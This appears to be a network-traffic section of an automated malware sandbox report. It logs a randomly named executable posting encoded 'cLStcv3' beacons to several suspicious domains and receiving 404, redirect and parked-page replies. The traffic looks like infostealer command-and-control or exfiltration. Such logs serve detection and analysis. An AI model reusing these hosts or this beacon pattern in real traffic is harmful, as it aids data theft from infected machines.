cLStcv3=PzvLsJzIPoL61Hlq/fBI12I7/hKOur05Wj6X6ZMWtgAhorKCCTLMwmf4TOV/+T6AB/bD6gSUqlF+laurJoTDTyhHJe2423dY17JX8LMm2h3J1XBrsYcQt+8wK/oWOc3jaiE/3ensMq0wJozdWubx7rJI9jYaDOmEznkIfC6scLs/3eSr3JvEupt2st9xepiqvTRHjAGHGTyY/ZStZ58vuQv4wdkxuJa6x2PEC4/d1Sc79BX3ffQClHYfN2rfgRye8la0cXbEmGOC+bXZO5q8McW8AREuCBXwj9/GvSYhAqH+otR1LZFf3VtvbS8vV7Cx2i0G+afrO3uvMknNuzQaC6zo/Cg64p7J8FSEd4Vqw5Q4DO2cQmWkp/k6IX0kpI96l9QgPWLBzjL5z5LMK6G5Y1FNpdzM2+y8Hcn3n8ONGIsvE8ZUaCf0nkyQu4YxHCET4rtafd4lnTPQgf4bB3DhX+UEyTIc0qdAXJKYHl+jFGTovRcm3syrxa17LKYP3wmcK94vlttBhR+myhKJ7yLNknZEgZmdlxO1+IwF7ySYYHFQgXmoaWkAk8u8UT/BdYFgURbhiA44FCJHlJgL3CrrrPPdKi628xULKWxRzTI1IEPN5awHF2PmTgb5w1pGC78KujevbQ9HKSJTZtpZKh1hEX4b3h+376XC00Z+0ph3HsNorDrmRemLh5/BLxxFgLsEgKaXoimcGOPgh2va/eT2CpPC47mPSD+Pn5JZmss+jGqdIyy7060eDsun99Ck0+Wu2+6i8pcCuCsNQCBEq7xqiRD36wBNXitWiTT4HLzrWfXN7f3MU/VUe9me5AeW7J0n55zuB13sbAynOsVh2nO+k1syPSMfwedHjvFGAkBL4sk7CYZ20YIhGiy0ncVVBUSTez44QWVI0gGSYYpurmSW/bi4ajkKIARjp86WxunWVdtgEvXDGYiBfGd5oV9RuQ7BvugLBWjQc41RyPMg8lU46G7hZEvGgjQQGvodDjmN5m3f [TRUNCATED]
Aug 29, 2024 12:23:46.797147989 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 10:23:46 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49725	91.184.0.200	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:48.700071096 CEST	596	OUT	GET /mm14/?cLStcv3=CxHrv/DWf/f861hRjo0poFYX/xbpoqE9Pkz05rQHhXI0npb5DSaX7ma8TZVC8w6DWPy//ybPymtpw/3NO+S+AgB4ZcSH0lp13pJAkJlF+hiKkERgruIPxb4FabZ2eu3OSDY3yr0=&oLy=-hKdflfxw6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.jobworklanka.online User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:23:49.316335917 CEST	500	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 10:23:49 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49726	3.33.130.190	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:54.372675896 CEST	874	OUT	POST /9b27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.helloanecdotenow.info Origin: http://www.helloanecdotenow.info Referer: http://www.helloanecdotenow.info/9b27/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 32 47 6c 53 32 70 44 70 72 53 34 32 34 75 4a 71 70 4c 75 59 49 31 76 76 32 55 58 65 73 34 54 6d 43 4e 78 78 67 59 32 64 2f 78 57 33 79 51 31 72 4e 46 6e 70 34 41 7a 53 69 7a 33 64 6f 6f 4b 42 56 4e 65 72 72 69 62 2f 57 78 69 61 37 34 43 47 4f 6f 39 74 4a 57 48 68 75 38 68 48 61 39 49 4b 53 7a 2f 64 58 30 70 66 51 43 71 6f 46 54 66 69 6a 53 59 49 48 53 4c 47 2b 45 49 4d 64 71 4d 74 58 43 73 2b 57 53 4a 70 4a 68 38 54 41 74 36 59 57 2b 31 54 79 4d 67 51 58 6a 65 67 46 72 44 33 65 34 62 67 56 42 71 55 71 33 47 4d 4c 77 33 6e 2f 6b 75 54 58 38 32 77 70 4e 39 77 6c 36 48 61 66 75 42 4a 4b 63 2b 32 50 42 43 4a Data Ascii: cLStcv3=2GlS2pDprS424uJqpLuYI1vv2UXes4TmCNxxgY2d/xW3yQ1rNFnp4AzSiz3dooKBVNerrib/Wxia74CGOo9tJWHhu8hHa9IKSz/dX0pfQCqoFTfijSYIHSLG+EIMdqMtXCs+WSJpJh8TAt6YW+1TyMgQXjegFrD3e4bgVBqUq3GMLw3n/kuTX82wpN9wl6HafuBJKc+2PBCJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49727	3.33.130.190	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:57.051069021 CEST	898	OUT	POST /9b27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.helloanecdotenow.info Origin: http://www.helloanecdotenow.info Referer: http://www.helloanecdotenow.info/9b27/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 32 47 6c 53 32 70 44 70 72 53 34 32 37 4f 35 71 6f 6f 47 59 4b 56 76 73 6f 6b 58 65 69 59 54 69 43 4e 4e 78 67 5a 43 4e 2b 43 79 33 79 79 74 72 4d 42 37 70 39 41 7a 53 71 54 32 56 6d 49 4b 61 56 4e 53 56 72 67 50 2f 57 31 4b 61 37 36 61 47 4f 37 6c 71 49 47 48 6a 6a 63 68 4a 45 4e 49 4b 53 7a 2f 64 58 30 4e 31 51 42 61 6f 46 67 33 69 73 51 77 4c 62 43 4c 46 6f 30 49 4d 4d 36 4d 70 58 43 74 52 57 54 6b 43 4a 6e 77 54 41 76 79 59 57 76 31 4d 38 4d 68 62 62 7a 66 77 44 72 57 69 66 72 75 67 57 43 53 44 78 45 57 63 4f 47 32 39 6a 58 75 77 46 73 57 79 70 50 6c 43 6c 61 48 77 64 75 35 4a 59 4c 79 52 41 31 6e 71 34 73 63 65 53 63 6b 57 41 55 35 68 35 69 76 69 4f 62 45 4f 46 67 3d 3d Data Ascii: cLStcv3=2GlS2pDprS427O5qooGYKVvsokXeiYTiCNNxgZCN+Cy3yytrMB7p9AzSqT2VmIKaVNSVrgP/W1Ka76aGO7lqIGHjjchJENIKSz/dX0N1QBaoFg3isQwLbCLFo0IMM6MpXCtRWTkCJnwTAvyYWv1M8MhbbzfwDrWifrugWCSDxEWcOG29jXuwFsWypPlClaHwdu5JYLyRA1nq4sceSckWAU5h5iviObEOFg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49728	3.33.130.190	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:23:59.636250973 CEST	1911	OUT	POST /9b27/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.helloanecdotenow.info Origin: http://www.helloanecdotenow.info Referer: http://www.helloanecdotenow.info/9b27/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 32 47 6c 53 32 70 44 70 72 53 34 32 37 4f 35 71 6f 6f 47 59 4b 56 76 73 6f 6b 58 65 69 59 54 69 43 4e 4e 78 67 5a 43 4e 2b 43 36 33 79 6e 78 72 4e 6d 50 70 2b 41 7a 53 67 7a 32 57 6d 49 4c 49 56 4e 61 52 72 67 54 46 57 33 79 61 70 50 47 47 66 36 6c 71 48 47 48 6a 71 38 68 45 61 39 4a 4b 53 7a 76 5a 58 30 64 31 51 42 61 6f 46 6d 4c 69 6c 69 59 4c 49 79 4c 47 2b 45 49 51 64 71 4d 42 58 44 4a 72 57 54 51 30 4a 33 51 54 41 4d 61 59 55 5a 5a 4d 30 4d 68 5a 59 7a 65 31 44 72 4c 79 66 72 69 47 57 44 6d 70 78 47 4b 63 4d 6a 7a 57 34 6c 7a 6d 58 4e 57 4c 30 39 42 62 38 4b 58 52 64 74 6b 7a 4a 61 62 69 47 78 76 58 78 63 59 59 62 76 41 52 46 45 30 55 7a 56 32 4e 46 59 78 52 5a 36 45 38 30 4f 7a 46 4a 6f 66 31 45 5a 4b 72 42 68 61 2f 54 51 31 69 76 43 44 33 67 4f 48 4f 45 5a 77 41 73 41 55 46 58 70 48 2b 6a 48 4d 43 33 49 70 48 4a 54 67 55 43 31 6e 54 79 61 55 73 42 57 4c 4c 65 59 53 6c 38 51 52 34 71 67 4c 6b 73 70 74 78 61 39 61 7a 58 78 48 78 63 7a 33 6e 6c 43 30 79 48 48 38 50 58 79 [TRUNCATED] Data Ascii: cLStcv3=2GlS2pDprS427O5qooGYKVvsokXeiYTiCNNxgZCN+C63ynxrNmPp+AzSgz2WmILIVNaRrgTFW3yapPGGf6lqHGHjq8hEa9JKSzvZX0d1QBaoFmLiliYLIyLG+EIQdqMBXDJrWTQ0J3QTAMaYUZZM0MhZYze1DrLyfriGWDmpxGKcMjzW4lzmXNWL09Bb8KXRdtkzJabiGxvXxcYYbvARFE0UzV2NFYxRZ6E80OzFJof1EZKrBha/TQ1ivCD3gOHOEZwAsAUFXpH+jHMC3IpHJTgUC1nTyaUsBWLLeYSl8QR4qgLksptxa9azXxHxcz3nlC0yHH8PXyBNdvrQEZ6XEXowL4/dVo8+FgdLfi69V4RvMhxQ59jxU7t1tQbNQnWcNg4opjEFxZYlXTz9QrWg6Wqkf/C7WkXqY4nOqyrgE/jjbHJ25VxJ76Ei9srgK9wZYqGGotJpMbcEZkumrMohChk0HusqzzVnidqEmg8swOf30siCHm3KOdBxQUPTcFty7WjRSqxjZVdsYa1TDefBtf5dmtWTcLQiGw3XJyTO32C+uY95M57kc7IXN8xBEiDkUeD+vJaE7ey2iJtHVJKYQv0lUedOpoZyrqvFsZAxdl0PrOhC19jksaETvbxDqVcSlV33W8zAhqH44Ym5plN0gMgIngeexBcADYKWegeJckpiYYMTgKGMyK2MV0RDWftT3IKk9yCoe31nO5xlWgo+1/4v0B+v2lTL8IIaWxfkv5tXfUkR27FZ9geg8qZp6/OpOhXddWdS11DmC8WvTkLzVyaTDFIqGWt5pJ+wFbCJuLk4lmawo4T5d8L7c7sj8GUv5BbfT2iIeyiJAVtrmH+Qc9ElYTEP5lB/dnqvSyXaeSyyosLiIMitNSVYD+lG6yyONyegRH5hXFv2cKsf4Zw3Uj1JIMF49NK+cXT+UmWJ7/nweFhYWrURMAGtnaw7J3eFW3jclAh3297KB9mIemyOgZ9rnXqYxebe4MtEzPjF8oeI [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49730	3.33.130.190	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:02.226151943 CEST	598	OUT	GET /9b27/?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.helloanecdotenow.info User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:24:34.026807070 CEST	414	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 29 Aug 2024 10:24:33 GMT Content-Type: text/html Content-Length: 274 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 4c 79 3d 2d 68 4b 64 66 6c 66 78 77 36 26 63 4c 53 74 63 76 33 3d 37 45 4e 79 31 64 6e 4b 2b 68 6c 76 6a 76 45 4f 2f 4f 61 59 47 43 33 57 67 6d 62 34 72 59 61 53 44 2b 55 2b 6a 62 36 4a 79 78 43 6a 69 51 55 33 50 6d 33 53 79 6c 7a 72 76 6b 50 31 76 71 53 42 46 64 50 6b 73 52 53 67 41 6b 47 53 38 66 50 50 51 4c 63 4a 4a 56 54 57 69 4f 39 6d 64 49 45 37 42 44 44 56 58 56 55 55 55 78 72 33 42 43 58 76 72 54 73 65 62 6b 4c 4f 35 32 4e 54 63 75 6b 46 55 31 78 47 61 56 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oLy=-hKdflfxw6&cLStcv3=7ENy1dnK+hlvjvEO/OaYGC3Wgmb4rYaSD+U+jb6JyxCjiQU3Pm3SylzrvkP1vqSBFdPksRSgAkGS8fPPQLcJJVTWiO9mdIE7BDDVXVUUUxr3BCXvrTsebkLO52NTcukFU1xGaVw="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49734	199.59.243.226	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:39.136827946 CEST	847	OUT	POST /6t1p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/6t1p/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 30 73 58 62 71 38 2f 68 61 44 6d 4d 67 31 78 4c 70 57 6e 4f 48 75 41 76 75 73 63 6f 65 35 74 46 67 6a 67 2b 4c 36 65 39 4f 47 6d 2b 77 41 67 5a 5a 47 75 32 44 58 50 38 35 4c 63 63 79 6b 42 67 69 57 50 66 63 6c 61 78 33 70 6e 58 4f 63 65 35 6a 34 5a 57 79 2f 54 37 6e 79 70 36 30 4d 48 31 62 69 37 37 62 71 4e 4d 41 68 38 70 34 33 50 38 71 45 72 66 6e 2f 47 46 56 6e 49 48 41 6a 71 55 37 55 4a 55 51 73 73 4f 5a 48 68 55 55 55 2b 72 50 77 38 62 57 72 4d 4b 57 75 6f 41 71 35 47 37 70 4e 5a 74 7a 67 68 65 34 5a 78 78 38 6e 32 53 4d 63 58 64 39 71 51 6f 79 46 65 4f 32 70 61 45 47 6f 65 47 6c 71 34 48 49 42 48 6e Data Ascii: cLStcv3=0sXbq8/haDmMg1xLpWnOHuAvuscoe5tFgjg+L6e9OGm+wAgZZGu2DXP85LccykBgiWPfclax3pnXOce5j4ZWy/T7nyp60MH1bi77bqNMAh8p43P8qErfn/GFVnIHAjqU7UJUQssOZHhUUU+rPw8bWrMKWuoAq5G7pNZtzghe4Zxx8n2SMcXd9qQoyFeO2paEGoeGlq4HIBHn
Aug 29, 2024 12:24:39.580970049 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 29 Aug 2024 10:24:39 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: d46bafb5-a6eb-44e8-8679-84ba2e7a9b1b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w== set-cookie: parking_session=d46bafb5-a6eb-44e8-8679-84ba2e7a9b1b; expires=Thu, 29 Aug 2024 10:39:39 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 31 6c 46 35 69 55 4d 2b 66 5a 38 50 2f 7a 46 45 42 33 78 61 4e 73 78 47 41 49 41 4d 76 6d 78 4b 6e 49 37 2b 70 74 37 5a 6b 6f 4d 56 43 70 52 56 42 74 44 68 4e 64 4e 77 2f 74 39 48 6d 71 68 32 63 59 2f 45 7a 37 55 49 6f 4b 68 4b 54 51 51 46 63 4c 66 32 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 29, 2024 12:24:39.580986977 CEST	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDQ2YmFmYjUtYTZlYi00NGU4LTg2NzktODRiYTJlN2E5YjFiIiwicGFnZV90aW1lIjoxNzI0OTI3MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49735	199.59.243.226	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:41.693847895 CEST	871	OUT	POST /6t1p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/6t1p/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 30 73 58 62 71 38 2f 68 61 44 6d 4d 68 55 42 4c 6c 52 37 4f 42 4f 41 73 79 38 63 6f 48 4a 73 43 67 6a 73 2b 4c 2b 50 34 4f 30 79 2b 2b 42 51 5a 65 44 61 32 45 58 50 38 68 62 63 56 2f 45 42 64 69 57 54 58 63 6e 4f 78 33 70 44 58 4f 5a 79 35 6a 6f 6c 58 77 76 54 35 73 53 70 34 37 73 48 31 62 69 37 37 62 75 63 58 41 68 6b 70 34 45 48 38 34 57 44 59 68 50 47 45 46 48 49 48 45 6a 72 64 37 55 4a 32 51 74 41 6f 5a 46 70 55 55 56 4f 72 4d 68 38 59 64 72 4d 49 4c 2b 6f 65 6a 36 76 67 78 4e 77 35 76 7a 68 78 75 4f 35 47 77 78 33 49 51 76 58 2b 76 36 77 71 79 48 47 38 32 4a 61 75 45 6f 6d 47 33 39 30 67 48 31 69 45 67 35 34 76 4a 66 6e 6a 57 61 68 45 34 63 4d 49 7a 45 67 65 33 41 3d 3d Data Ascii: cLStcv3=0sXbq8/haDmMhUBLlR7OBOAsy8coHJsCgjs+L+P4O0y++BQZeDa2EXP8hbcV/EBdiWTXcnOx3pDXOZy5jolXwvT5sSp47sH1bi77bucXAhkp4EH84WDYhPGEFHIHEjrd7UJ2QtAoZFpUUVOrMh8YdrMIL+oej6vgxNw5vzhxuO5Gwx3IQvX+v6wqyHG82JauEomG390gH1iEg54vJfnjWahE4cMIzEge3A==
Aug 29, 2024 12:24:42.138727903 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 29 Aug 2024 10:24:41 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 293a6654-ad4e-4d76-9d26-c8db11b64166 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w== set-cookie: parking_session=293a6654-ad4e-4d76-9d26-c8db11b64166; expires=Thu, 29 Aug 2024 10:39:42 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 31 6c 46 35 69 55 4d 2b 66 5a 38 50 2f 7a 46 45 42 33 78 61 4e 73 78 47 41 